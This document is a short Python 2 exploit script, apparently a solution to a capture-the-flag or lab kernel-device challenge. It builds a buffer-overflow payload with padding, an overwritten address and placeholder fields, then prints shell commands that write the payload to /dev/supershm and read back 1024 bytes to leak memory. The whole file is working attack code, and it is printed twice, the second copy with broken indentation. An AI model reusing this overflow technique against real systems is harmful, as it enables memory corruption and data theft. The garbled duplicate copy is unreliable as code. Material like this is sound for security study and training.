volpino/jfk_exploit.py

## jfk_exploit.py
import struct

def q(word):
    return struct.pack("<I", word)

addr = q(0xc332fc05)
is_valid = "BBBB"
myname = "DDDD"
payload = "A"*32 + addr + is_valid + myname

print "echo -ne 'c{}' > /dev/supershm".format(repr(payload)[1:-1])
print "echo -ne 's{}' > /dev/supershm".format(myname)
print "head -c 1024 /dev/supershm"
	import struct

	def q(word):
	return struct.pack("<I", word)

	addr = q(0xc332fc05)
	is_valid = "BBBB"
	myname = "DDDD"
	payload = "A"*32 + addr + is_valid + myname

	print "echo -ne 'c{}' > /dev/supershm".format(repr(payload)[1:-1])
	print "echo -ne 's{}' > /dev/supershm".format(myname)
	print "head -c 1024 /dev/supershm"